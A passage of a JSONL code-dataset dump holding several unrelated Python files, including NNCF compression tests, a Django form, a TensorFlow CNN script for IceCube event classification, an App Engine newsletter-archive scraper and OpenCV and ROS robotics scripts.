),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('filter_pruning', filter_pruning_params),\n compression_levels=NPF_levels\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params).add_algo(\n 'quantization'),\n compression_levels=[CompressionLevel.PARTIAL] * 2 + [CompressionLevel.FULL],\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params).add_algo(\n 'quantization', staged_quantization_params),\n compression_levels=NPF_levels,\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('quantization', staged_quantization_params).add_algo(\n 'filter_pruning', filter_pruning_params),\n compression_levels=NPF_levels,\n ),\n CompressionLevelTestStruct(\n config_provider=TestConfigCreator().add_algo('magnitude_sparsity', magnitude_sparsity_params).add_algo(\n 'quantization', staged_quantization_params).add_algo('filter_pruning', filter_pruning_params),\n compression_levels=NPF_levels,\n ),\n]\n\n\n@pytest.mark.parametrize('test_struct', LIST_OF_TEST_PARAMS, ids=[str(param) for param in LIST_OF_TEST_PARAMS])\ndef test_can_get_compression_level(test_struct: CompressionLevelTestStruct):\n config_provider, compression_levels = test_struct.config_provider, test_struct.compression_levels\n model = BasicConvTestModel()\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config_provider.create())\n compression_scheduler = compression_ctrl.scheduler\n assert compression_ctrl.compression_level() == compression_levels[0]\n\n compression_scheduler.epoch_step()\n assert compression_ctrl.compression_level() == compression_levels[0]\n\n compression_scheduler.epoch_step()\n assert compression_ctrl.compression_level() == compression_levels[1]\n\n compression_scheduler.epoch_step()\n assert compression_ctrl.compression_level() == compression_levels[2]\n\n\n@pytest.mark.parametrize(('src', 'dst', 'ref'),\n (\n (CompressionLevel.NONE, CompressionLevel.NONE, CompressionLevel.NONE),\n (CompressionLevel.PARTIAL, CompressionLevel.PARTIAL, CompressionLevel.PARTIAL),\n (CompressionLevel.FULL, CompressionLevel.FULL, CompressionLevel.FULL),\n (CompressionLevel.NONE, CompressionLevel.PARTIAL, CompressionLevel.PARTIAL),\n (CompressionLevel.NONE, CompressionLevel.FULL, CompressionLevel.PARTIAL),\n (CompressionLevel.PARTIAL, CompressionLevel.FULL, CompressionLevel.PARTIAL))\n )\ndef test_combo_of_compression_levels(src, dst, ref):\n assert src + dst == ref\n assert dst + src == ref\n src_c = copy.deepcopy(src)\n src_c += dst\n assert src_c == ref\n dst_c = copy.deepcopy(dst)\n dst_c += src\n assert dst_c == ref\n\n\nQUANTIZATION = 'quantization'\nSPARSITY_TYPES = ['magnitude', 'rb', 'const']\nSPARSITY_ALGOS = ['_'.join([type, 'sparsity']) for type in SPARSITY_TYPES] # 3S\n\nLOAD_ALGOS = list(itertools.product([QUANTIZATION], SPARSITY_ALGOS)) # Q + 3S\nLOAD_ALGOS += itertools.product(SPARSITY_ALGOS, [QUANTIZATION]) # 3S + Q\n\nSAVE_ALGOS = [[algo] for algo in SPARSITY_ALGOS] # 3S\nSAVE_ALGOS += [[QUANTIZATION]] # Q\nSAVE_ALGOS += LOAD_ALGOS # Q , 3S, 3S + Q, Q+3S\n\nALGOS = list(itertools.product(SAVE_ALGOS, LOAD_ALGOS))\n\n\n@pytest.fixture(scope='module', params=ALGOS,\n ids=['__'.join(['save:' + '_'.join(a[0]),\n 'load:' + '_'.join(a[1])]) for a in ALGOS]\n )\ndef _algos(request):\n pair_algos = request.param\n save_algos = pair_algos[0]\n load_algos = pair_algos[1]\n resume_ok = False\n # resume expects the same list of algorithms\n if save_algos == load_algos:\n resume_ok = True\n\n if len(save_algos) == len(load_algos):\n for s, v in zip(save_algos, load_algos):\n if s != v and ('magnitude' in s and 'const' in v or 'const' in s and 'magnitude' in v):\n resume_ok = True\n\n # Priority mechanism ensures that algo permutations are irrelevant\n if set(save_algos) == set(load_algos):\n resume_ok = True\n else:\n saved_sparsity = filter(lambda x: x != QUANTIZATION, save_algos)\n loaded_sparsity = filter(lambda x: x != QUANTIZATION, load_algos)\n\n for s, v in zip(saved_sparsity, loaded_sparsity):\n # resume works fine for magnitude <-> const combo, because they have similar parameters\n if s != v and ('magnitude' in s and 'const' in v or 'const' in s and 'magnitude' in v):\n resume_ok = True\n\n return {\n 'save_algos': save_algos,\n 'load_algos': load_algos,\n 'is_resume_ok': resume_ok\n }\n\n\nMODEL_WRAPPER = [\"CPU\", \"GPU\"]\nWRAPPERS = list(itertools.product(MODEL_WRAPPER, MODEL_WRAPPER))\n\n\n@pytest.fixture(scope='function', params=WRAPPERS,\n ids=['_'.join(['from:' + w[0], 'to:' + w[1]]) for w in WRAPPERS])\ndef _model_wrapper(request):\n modes = request.param\n\n def wrap_model(mode, model):\n if mode == \"GPU\":\n model = DataParallel(model, [0])\n return model\n\n return {\n 'save_model': partial(wrap_model, modes[0]),\n 'resume_model': partial(wrap_model, modes[1]),\n }\n\n\n@pytest.mark.parametrize('is_resume', (True, False), ids=['resume', 'load_weights'])\ndef test_load_state_interoperability(_algos, _model_wrapper, is_resume):\n config_save = get_empty_config()\n config_save['compression'] = [{'algorithm': algo} for algo in _algos['save_algos']]\n compressed_model_save, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(), config_save)\n model_save = _model_wrapper['save_model'](compressed_model_save)\n saved_model_state = model_save.state_dict()\n ref_num_loaded = len(saved_model_state)\n\n config_resume = get_empty_config()\n config_resume['compression'] = [{'algorithm': algo} for algo in _algos['load_algos']]\n compressed_model_resume, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(),\n config_resume)\n model_resume = _model_wrapper['resume_model'](compressed_model_resume)\n\n if not is_resume or (is_resume and _algos['is_resume_ok']):\n act_num_loaded = load_state(model_resume, saved_model_state, is_resume)\n\n if ('magnitude_sparsity' in _algos['load_algos'] or 'const_sparsity' in _algos['load_algos']) \\\n and 'rb_sparsity' in _algos['save_algos']:\n # no need to load _mask and _uniform\n ref_num_loaded -= 2\n assert act_num_loaded == ref_num_loaded\n else:\n with pytest.raises(RuntimeError):\n load_state(model_resume, saved_model_state, is_resume)\n\n\nLIST_ALGOS = [None, QUANTIZATION]\nLIST_ALGOS += SPARSITY_ALGOS # 3S\n\n\n@pytest.mark.parametrize('is_resume', (True, False), ids=['resume', 'load_weights'])\n@pytest.mark.parametrize('algo', tuple(LIST_ALGOS))\ndef test_ordinary_load(algo, _model_wrapper, is_resume):\n config = get_empty_config()\n if algo:\n config['compression'] = {'algorithm': algo}\n\n compressed_model_save, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(), config)\n model_save = _model_wrapper['save_model'](compressed_model_save)\n\n compressed_model_resume, _ = create_compressed_model_and_algo_for_test(BasicConvTestModel(), config)\n model_resume = _model_wrapper['resume_model'](compressed_model_resume)\n\n num_loaded = load_state(model_resume, model_save.state_dict(), is_resume)\n\n assert num_loaded == len(model_save.state_dict())\n\n\ndef test_can_export_compressed_model_with_input_output_names(tmp_path):\n test_path = str(tmp_path.joinpath('test.onnx'))\n target_input_names = ['input1', 'input2']\n target_output_names = ['output1', 'output2']\n\n model = BasicTestModelWithTwoInputOutput()\n config = get_basic_asym_quantization_config()\n\n config[\"input_info\"] = [{'sample_size': [1, 1, 4, 4]}, {'sample_size': [1, 1, 4, 4]}]\n\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n compression_ctrl.export_model(test_path, input_names=target_input_names,\n output_names=target_output_names)\n\n assert os.path.exists(test_path)\n\n onnx_model = onnx.load(test_path)\n # pylint: disable=no-member\n curr_input_names = [node.name for node in onnx_model.graph.input]\n curr_output_names = [node.name for node in onnx_model.graph.output]\n\n assert curr_input_names == target_input_names\n assert curr_output_names == target_output_names\n\n\ndef test_can_export_compressed_model_with_specified_domain_for_custom_ops(tmp_path):\n test_path = str(tmp_path.joinpath('test.onnx'))\n\n model = BasicTestModelWithTwoInputOutput()\n config = get_basic_asym_quantization_config()\n\n config[\"input_info\"] = [{'sample_size': [1, 1, 4, 4]}, {'sample_size': [1, 1, 4, 4]}]\n\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n\n compression_ctrl.export_model(test_path)\n\n assert os.path.exists(test_path)\n\n onnx_model = onnx.load(test_path)\n\n count_custom_ops = 0\n # pylint: disable=no-member\n for op_node in onnx_model.graph.node:\n if op_node.op_type == \"FakeQuantize\":\n assert op_node.domain == DOMAIN_CUSTOM_OPS_NAME\n count_custom_ops += 1\n\n assert count_custom_ops == 4\n\n\ndef change_compression_algorithms_order(config):\n # changes order of compression algorithms in config\n def shift_list(list_for_shift):\n shifted_list = [list_for_shift.pop()] + list_for_shift\n return shifted_list\n\n config_compression = list(config.get('compression', {}))\n shifted_config_compression = shift_list(config_compression)\n config.update({'compression': shifted_config_compression})\n return config\n\n\ndef get_basic_rb_sparsity_int8_config():\n config = get_basic_sparsity_config()\n config.update({\n \"compression\": [\n {\n \"algorithm\": \"rb_sparsity\",\n \"sparsity_init\": 0.02,\n \"params\":\n {\n \"schedule\": \"polynomial\",\n \"sparsity_target\": 0.5,\n \"sparsity_target_epoch\": 2,\n \"sparsity_freeze_epoch\": 3\n },\n },\n {\n \"algorithm\": \"quantization\"\n }\n ]\n }\n )\n return config\n\n\ncomp_loss_configs = [\n get_basic_rb_sparsity_int8_config(),\n change_compression_algorithms_order(get_basic_rb_sparsity_int8_config())\n]\n\n\n@pytest.mark.parametrize(\"config\", comp_loss_configs,\n ids=[reduce(lambda x, y: x + \"_\" + y.get(\"algorithm\", \"\"), config.get('compression', []),\n 'compression')\n for config in comp_loss_configs])\n@pytest.mark.skipif(not cuda.is_available(), reason=\"Since its GPU test, no need to run this without GPUs available\")\ndef test_compression_loss_gpu_device_compatibility(config):\n model = BasicConvTestModel()\n model.to(cuda.current_device())\n _, compression_ctrl = create_compressed_model_and_algo_for_test(model, config)\n compression_ctrl.loss()\n\n\n@pytest.mark.parametrize('algo_name, target_device',\n list(itertools.product(\n list(COMPRESSION_ALGORITHMS.registry_dict.keys()),\n list([x.value for x in HWConfigType]))))\ndef test_target_device_is_propagated_to_algos(mocker, algo_name, target_device):\n if algo_name == NoCompressionAlgorithmBuilder.__name__:\n pytest.skip()\n model = BasicConvTestModel()\n config = NNCFConfig.from_dict({\n \"input_info\":\n {\n \"sample_size\": [1, 1, 32, 32],\n },\n \"compression\": {\n \"algorithm\": algo_name\n },\n \"target_device\": target_device\n })\n\n import nncf\n compression_builder_init_spy = mocker.spy(nncf.api.compression.CompressionAlgorithmBuilder, '__init__')\n create_compressed_model_and_algo_for_test(model, config)\n assert compression_builder_init_spy.call_args[0][1][\"hw_config_type\"] == HWConfigType.from_str(target_device)\n","sub_path":"tests/test_algo_common.py","file_name":"test_algo_common.py","file_ext":"py","file_size_in_byte":18709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"243743902","text":"from .models import Paciente\nfrom django import forms\nfrom django.forms import ModelForm\n\n\n\nclass DateInput(forms.DateInput):\n input_type = 'date'\n\n\n\nclass PacienteForm(ModelForm, forms.Form):\n class Meta:\n model = Paciente\n fields = '__all__'\n widgets = {\n 'dataNascimento': DateInput(),\n 'dataInternamento': DateInput(),\n 'dataAlta': DateInput()\n }\n # cartaoSUS = forms.CharField(widget=forms.TextInput(\n # attrs={\n # 'class': 'MyClass',\n # 'placeholder': 'Cartão do SUS'\n # }\n # ))\n\n\n\n# class PacienteForm(forms.Form):\n# cartaoSUS = forms.CharField(widget=forms.TextInput(\n# attrs={\n# 'class': 'MyClass',\n# 'placeholder': 'Cartão do SUS'\n# }\n# ))\n \n\n \n\n\n","sub_path":"Pacientes/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"181185057","text":"from django.template import VariableNode, TextNode\nfrom GChartWrapper import GChart\n\nfrom native_tags.decorators import block\n\n\nCMDS = ('title','axes.type','axes.label','type','encoding','fill','color','scale','legend')\n\ndef parse_cmd(value):\n value = value.lstrip()\n for cmd in CMDS:\n if value.startswith(cmd):\n return cmd,value[len(cmd):].strip()\n return None, None\n\ndef gchart(context, nodelist, type, dataset, **kwargs):\n G = GChart(type, dataset, encoding=kwargs.pop('encoding','text'))\n for node in nodelist:\n if isinstance(node, TextNode):\n for part in node.render(context).splitlines():\n cmd,value = parse_cmd(part)\n if cmd is None: continue\n if cmd.startswith('axes'):\n cmd = getattr(G.axes, cmd[5:])\n else:\n cmd = getattr(G, cmd)\n cmd(*value.split())\n if 'instance' in kwargs:\n return G\n return G.img(**kwargs)\ngchart = block(gchart)\n","sub_path":"native_tags/contrib/gchart.py","file_name":"gchart.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"504960467","text":"#!/usr/bin/env python\n\n# docker run -v /home/olivas/icecube_deep_learning:/opt/icecube_deep_learning -u $(id -u):$(id -g) -it tensorflow/tensorflow /opt/icecube_deep_learning/super_simple_cnn.py\n\nimport os\nimport argparse\nimport logging\nimport pickle\nimport random\nimport numpy as np\nimport tensorflow as tf\n\nparser = argparse.ArgumentParser(description='Hello IceCube')\nparser.add_argument('--data_path',\n default='/opt/icecube_deep_learning/data',\n help='Path to training and test data.')\nparser.add_argument('--epochs',\n dest='epochs',\n default=10,\n type=int,\n help='Number of units in the hidden layer.')\nparser.add_argument('--n-hidden-units',\n dest='n_hidden_units',\n default=512,\n type=int,\n help='Number of units in the hidden layer.')\nparser.add_argument('--activation',\n dest='activation',\n default='relu',\n help='Name of tf.keras.activation function.')\nparser.add_argument('--optimizer',\n dest='optimizer',\n default='sgd',\n help='Name of tf.keras.optimizer function.')\nparser.add_argument('--loss',\n dest='loss',\n default='categorical_crossentropy',\n help='Name of tf.keras.loss function.')\nparser.add_argument('--metrics',\n dest='metrics',\n default='accuracy',\n help='Name of tf.keras.metrics function.')\nargs = parser.parse_args()\n\nactivation_options = ['elu', 'hard_sigmoid', 'linear', 'relu', 'selu',\n 'sigmoid', 'softmax', 'softplus', 'softsign', 'tanh']\n\noptimizer_options = ['adadelta', 'adagrad', 'adam', 'adamax', 'nadam', 'rmsprop', 'sgd']\n\nloss_options = ['binary_crossentropy', 'categorical_hinge', 'cosine', 'cosine_proximity',\n 'hinge', 'kullback_leibler_divergence', 'logcosh', 'mae', 'mape',\n 'mean_absolute_error', 'mean_absolute_percentage_error', 'categorical_crossentropy',\n 'mean_squared_logarithmic_error', 'mse', 'poisson', 'sparse_categorical_crossentropy',\n 'squared_hinge'] \n\nmetrics_options = ['accuracy', 'auc', 'average_precision_at_k', 'false_negatives',\n 'false_negatives_at_thresholds', 'false_positives', 'false_positives_at_thresholds',\n 'mean', 'mean_absolute_error', 'mean_cosine_distance', 'mean_iou', 'mean_per_class_accuracy',\n 'mean_relative_error', 'mean_squared_error', 'mean_tensor', 'percentage_below',\n 'precision', 'precision_at_k', 'precision_at_thresholds', 'precision_at_top_k',\n 'recall', 'recall_at_k', 'recall_at_thresholds', 'recall_at_top_k', 'root_mean_squared_error',\n 'sensitivity_at_specificity', 'sparse_average_precision_at_k', 'sparse_precision_at_k',\n 'specificity_at_sensitivity', 'true_negatives', 'true_negatives_at_thresholds',\n 'true_positives', 'true_positives_at_thresholds']\n\nassert(args.activation in activation_options)\nassert(args.optimizer in optimizer_options)\nassert(args.loss in loss_options)\n\nvalid_metrics = list()\nfor m in args.metrics.split(','):\n if m in metrics_options:\n valid_metrics.append(m)\n else: \n logging.warn('%s is not a valid metric. Ignoring.' % m)\n\ntracks = pickle.load(open(os.path.join(args.data_path,'pev_starting_tracks.pkl')))\ncascades = pickle.load(open(os.path.join(args.data_path,'pev_cascades.pkl')))\n\nlabeled_data = [(0,h) for h in cascades] + [(1,h) for h in tracks]\nrandom.shuffle(labeled_data)\n\nn_output_units = 2\n\nfrom tensorflow.keras.layers import Input, Dense, Flatten\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.utils import to_categorical\n\ninput_layer = Input(shape=(28, 28, 1))\nconvolution_stage = Conv2D(32,\n (2, 2), \n input_shape=(28, 28, 1),\n activation=args.activation)(input_layer)\npooling_stage = MaxPooling2D(pool_size=(2,2))(convolution_stage) \nflatten_stage = Flatten()(pooling_stage)\noutput_layer = Dense(n_output_units, activation='softmax')(flatten_stage)\n\nmodel = Model(inputs=input_layer, outputs=output_layer)\n\nmodel.compile(optimizer=args.optimizer,\n loss=args.loss,\n metrics=valid_metrics)\n\nx_train = np.array([h for l,h in labeled_data[:200]])\nx_train = x_train.reshape(200, 28, 28, 1)\n\ny_train = np.array([l for l,h in labeled_data[:200]])\ny_train_binary = to_categorical(y_train)\nassert(len(x_train) == len(y_train))\nmodel.fit(x_train, y_train_binary, epochs=args.epochs)\n\nx_test = np.array([h for l,h in labeled_data[200:]])\nprint(x_test.shape)\nx_test = x_test.reshape(200, 28, 28, 1)\ny_test = np.array([l for l,h in labeled_data[200:]])\ny_test_binary = to_categorical(y_test)\nmodel.evaluate(x_test, y_test_binary)\n\nmodel.summary()\n","sub_path":"super_simple_cnn.py","file_name":"super_simple_cnn.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"90844064","text":"#!/usr/bin/env python\r\n\r\n# Copyright (C) Anirudha Bose, 2013,2014\r\n# Originally developed for IIIT Bhubaneswar ACM Student Chapter\r\n\r\n# This library is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU Lesser General Public License as published\r\n# by the Free Software Foundation; either version 2.1 of the License, or\r\n# (at your option) any later version.\r\n\r\n# This library is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See\r\n# the GNU Lesser General Public License for more details.\r\n\r\n\r\nimport webapp2\r\nfrom google.appengine.api import urlfetch\r\nimport jinja2\r\nimport os\r\n\r\n#Initializing Jinja2 --> ==========================================================================#\r\njinja_environment = jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.dirname(__file__))) #\r\n#==================================================================================================#\r\n\r\ntarget = \"\"\r\ncss = '''\r\n '''\r\n\r\nclass Newsletters_TechNews_Monthly(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://technews.acm.org/archives.cfm\").content\r\n archive_begin = html.find(\"
\")+6\r\n archive_end = html.find(\"
\",archive_begin)\r\n html = html[archive_begin:archive_end]\r\n html = \"\"+css+'''\r\n \r\n

Select a month:

\r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(\"archives.cfm?d=\",\"daily/\")\r\n self.response.out.write(html)\r\n \r\nclass Newsletters_TechNews_Daily(webapp2.RequestHandler):\r\n def get(self,arg):\r\n self.response.headers['Content-Type'] = 'text/html'\r\n year = int(arg[:4])\r\n if year > 2005:\r\n global target\r\n target = \"archives\"\r\n else:\r\n global target\r\n target = \"articles\"\r\n html = urlfetch.fetch(url=\"http://technews.acm.org/\"+target+\".cfm?d=\"+arg).content\r\n archive_begin = html.find(\"
\")+6\r\n archive_end = html.find(\"\"+css+'''\r\n \r\n

Select a day:

\r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(target+\".cfm?fo=\",\"../article/\")\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_TechNews_Article(webapp2.RequestHandler):\r\n def get(self,arg1,arg2):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://technews.acm.org/\"+target+\".cfm?fo=\"+arg1+\"/\"+arg2).content\r\n nav_bar_start = html.find('
',nav_bar_start)\r\n html = html[:nav_bar_start]+html[nav_bar_end:]\r\n if target == \"archives\":\r\n footer_start = html.find(\"\")\r\n footer_end = html.find('',footer_start)+6\r\n html = html[:footer_start]+html[footer_end:]\r\n else:\r\n footer_start = html.find(\"
\")\r\n footer_end = html.find('',footer_start)+6\r\n html = html[:footer_start]+html[footer_end:]\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_LinuxNews_Monthly(webapp2.RequestHandler):\r\n def get(self):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://www.linuxtoday.com/news/archives\").content\r\n archive_begin = html.find(\"

Select a month

\")\r\n archive_end = html.find(\"\",archive_begin)\r\n html = html[archive_begin:archive_end]\r\n html = \"\"+css+'''\r\n \r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(\"http://www.linuxtoday.com/news/archives/\",\"/newsletters/linuxnews/daily/\")\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_LinuxNews_Daily(webapp2.RequestHandler):\r\n def get(self,arg):\r\n self.response.headers['Content-Type'] = 'text/html'\r\n html = urlfetch.fetch(url=\"http://www.linuxtoday.com/news/archives/\"+arg).content\r\n archive_begin = html.find(\"

Select a day

\")\r\n archive_end = html.find(\"\",archive_begin)\r\n html = html[archive_begin:archive_end]\r\n html = \"\"+css+'''\r\n \r\n
'''+html+'''\r\n
\r\n \r\n'''\r\n html = html.replace(\"http://www.linuxtoday.com/news/archives/\",\"../../article/\")\r\n self.response.out.write(html)\r\n\r\nclass Newsletters_LinuxNews_Article(webapp2.RequestHandler):\r\n def get(self,arg1,arg2):\r\n self.response.headers['Content-Type'] = 'text/html' \r\n html = urlfetch.fetch(url=\"http://www.linuxtoday.com/news/archives/\"+arg1+\"/\"+arg2).content\r\n content_start = html.find('

Linux News')\r\n content_end = html.find('',content_start)+5\r\n html = html[content_start:content_end]\r\n html = \"\"+css+'''\r\n \r\n
'''+html+'''\r\n
\r\n \r\n''' \r\n self.response.out.write(html)\r\n\r\nclass Newsletters(webapp2.RequestHandler):\r\n def get(self):\r\n html = \"\"+css+'''\r\n \r\n
\r\n

The following newsletters are archived here:

\r\n

ACM Tech News --> Full and updated archives of ACM TechNews from 1999 to present.

\r\n

Linux News --> Updated archives of news related to Linux and Open Source from 1998 to present from many different blogs.\r\n


Note: Fetching of archives is an intensive task. If you encounter any 500 Internal Server Error (or Python Tracebacks), reloading the page should solve the problem. The scripts have been known to fail during outages of ACM servers which host the articles.\r\n

Contribute: GitHub repository has been permanently moved here.

\r\n
\r\n \r\n'''\r\n self.response.out.write(html)\r\n \r\n\r\napp = webapp2.WSGIApplication([('/newsletters/', Newsletters),\r\n ('/newsletters/technews/', Newsletters_TechNews_Monthly),\r\n ('/newsletters/technews/daily/(.*)', Newsletters_TechNews_Daily),\r\n ('/newsletters/technews/article/(.*)/(.*)', Newsletters_TechNews_Article),\r\n ('/newsletters/linuxnews/', Newsletters_LinuxNews_Monthly),\r\n ('/newsletters/linuxnews/daily/(.*)', Newsletters_LinuxNews_Daily),\r\n ('/newsletters/linuxnews/article/(.*)/(.*)', Newsletters_LinuxNews_Article)],debug=True)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"364600743","text":"# ※리스트로 스택(Stack) 구현하기\n# 스택(Stack)이란 후입선출(Last In First Out)의 자료구조이며 나중에 들어온 데이터가 먼저 나갑니다.\n\n# -소스코드\nstack=[]\nb=0\nwhile b < 10 :\n stack.insert(0,input())\n b += 1\nc=len(stack)\nwhile True:\n print(stack[0])\n stack.pop(0)\n c-=1\n if c==0:\n break;\n \nprint(stack)\n# 빈 stack 리스트를 만들고 while문 안에 insert함수를 이용해서 리스트가 LIFO 형태를 띄도록 맨 앞 부분에 \n# 숫자를 insert 합니다.\n# 나머지는 queue와 같은 구조로, Last In First Out을 위해 리스트 첫번째에 있는 숫자를 출력하고 바로 제거 합니다.\n# 출력 결과는 LIFO 형태를 보이고 빈리스트가 됩니다.","sub_path":"list.stack.py","file_name":"list.stack.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387275060","text":"import numpy as np\nimport cv2\n\ntry:\n import cPickle as pickle\nexcept:\n import pickle\n\n# Load images\nleft_img = cv2.imread(\"../images/test/8ft_L_masked.jpg\")\nright_img = cv2.imread(\"../images/test/8ft_R_masked.jpg\")\n\n# Un-distort\nwith open('../calib/left.calib','rb') as calibfile:\n h, w = left_img.shape[:2]\n ret, mtx, dist, rvecs, tvecs, _, _ = pickle.load(calibfile)\n newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n # undistort\n left_img = cv2.undistort(left_img, mtx, dist, None, newcameramtx)\n x,y,w,h = roi\n left_img = left_img[y:y+h, x:x+w]\n\nwith open('../calib/right.calib','rb') as calibfile:\n h, w = right_img.shape[:2]\n ret, mtx, dist, rvecs, tvecs, _, _ = pickle.load(calibfile)\n newcameramtx, roi=cv2.getOptimalNewCameraMatrix(mtx,dist,(w,h),1,(w,h))\n # undistort\n right_img = cv2.undistort(right_img, mtx, dist, None, newcameramtx)\n x,y,w,h = roi\n right_img = right_img[y:y+h, x:x+w]\n\n# Downsize\nleft_img = cv2.resize(left_img, (640, 480))\nright_img = cv2.resize(right_img, (640, 480))\n\n# Initiate FAST object with default values\nfast = cv2.FastFeatureDetector()\n\n# Find and draw keypoints and coordinates\nmaxnum = 1\nnum = 0\nleft_kp = fast.detect(left_img, None)\nleft_img_kp = cv2.drawKeypoints(left_img, left_kp, color=(255,0,0))\nfor kp in left_kp:\n pt = (int(kp.pt[0]), int(kp.pt[1]))\n cv2.putText(left_img_kp, str(pt), pt, cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, color=(255, 0, 0), thickness=1)\n num += 1\n if num >= maxnum:\n break\n\nnum = 0\nright_kp = fast.detect(right_img, None)\nright_img_kp = cv2.drawKeypoints(right_img, right_kp, color=(255, 0, 0))\nfor kp in right_kp:\n pt = (int(kp.pt[0]), int(kp.pt[1]))\n cv2.putText(right_img_kp, str(pt), pt, cv2.FONT_HERSHEY_SIMPLEX, fontScale=1, color=(255, 0, 0), thickness=1)\n num += 1\n if num >= maxnum:\n break\n\nimg_out = np.concatenate((left_img_kp, right_img_kp), axis=1)\ncv2.imshow('image',img_out)\ncv2.imwrite('../images/output/fast_corner.jpg',img_out)\ncv2.waitKey(0)\n\n","sub_path":"src/fast_stereo_pairing.py","file_name":"fast_stereo_pairing.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"268088704","text":"import re\nimport gzip\nfrom wigfixblock import WigfixBlock\nimport matplotlib.pyplot as plt\n\n\ndef plot_cons(wigfix_file):\n \"\"\"\n Plot blocks of conservation scores to evaluate\n :param wigfix_file:\n :return:\n \"\"\"\n\n # chromosome in str representation\n ch = re.search(\"chr(?:\\d{1,2}|[XYM])\", wigfix_file).group()\n\n # make one regex for a block of header and data\n # this should be compatible with any wiggle formatted data\n # (source: http://genome.ucsc.edu/goldenPath/help/phastCons.html)\n # NOTE: inner group for scores is NON-CAPTURING with the (?:...) notation, just finds matches for outer group\n block = re.compile(\"fixedStep chrom=(chr\\d+) start=(\\d+) step=(\\d+)\\n((?:-?\\d\\.\\d{3}\\n)+)\", re.MULTILINE)\n\n with gzip.open(wigfix_file, \"r\") as f:\n cons = f.read()\n\n # the end of the previous block (starts at 0)\n end = 0\n\n # use an iterator to return blocks\n for blk in re.finditer(block, cons):\n\n # feed the match groups into the WigFixBlock class to create the mask\n blk = WigfixBlock(blk.groups())\n\n # get the start and end position for the block\n start = blk.start\n end = start + len(blk.scores)\n\n # make sure that the block obeys the normal rules\n assert blk.chrom == ch\n assert blk.step == 1\n\n plt.plot(range(start, end), blk.scores)\n plt.show()\n\n\nphastfile = \"/Users/davidmurphy/GoogleDrive/linked_selection/data/data_scrap/chr2.phastCons100way.wigFix.gz\"\nplot_cons(phastfile)\n","sub_path":"GoogleDrive/linked_selection/myprograms/cluster_code/filtering/plot_cons_scores.py","file_name":"plot_cons_scores.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"182096416","text":"#!/usr/bin/env python\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport easydict\nimport matplotlib\nimport numpy as np\nimport os.path as osp\n# import time\nimport yaml\n\nmatplotlib.use('Agg') # NOQA\n\nimport chainer\nimport cv_bridge\nfrom dynamic_reconfigure.server import Server\nfrom jsk_recognition_msgs.msg import ClassificationResult\nfrom jsk_recognition_msgs.msg import ClusterPointIndices\nfrom jsk_recognition_msgs.msg import Label\nfrom jsk_recognition_msgs.msg import LabelArray\nfrom jsk_recognition_msgs.msg import Rect\nfrom jsk_recognition_msgs.msg import RectArray\nfrom jsk_topic_tools import ConnectionBasedTransport\nimport matplotlib.pyplot as plt\nimport message_filters\nfrom pcl_msgs.msg import PointIndices\nimport rospy\nimport scipy\nfrom sensor_msgs.msg import Image\nfrom sklearn.cluster import KMeans\nfrom std_srvs.srv import Trigger\nfrom std_srvs.srv import TriggerResponse\n\nfrom dualarm_grasping.models import OccludedGraspMaskRCNNResNet101\nfrom dualarm_grasping.visualizations import vis_occluded_grasp_instance_segmentation\n\nfrom dualarm_grasping.cfg \\\n import DualarmOccludedGraspInstanceSegmentationConfig\nfrom dualarm_grasping.msg import GraspClassificationResult\nfrom dualarm_grasping.srv import GetAnother\nfrom dualarm_grasping.srv import GetAnotherResponse\n\n\nfilepath = osp.dirname(osp.realpath(__file__))\n\n\nclass 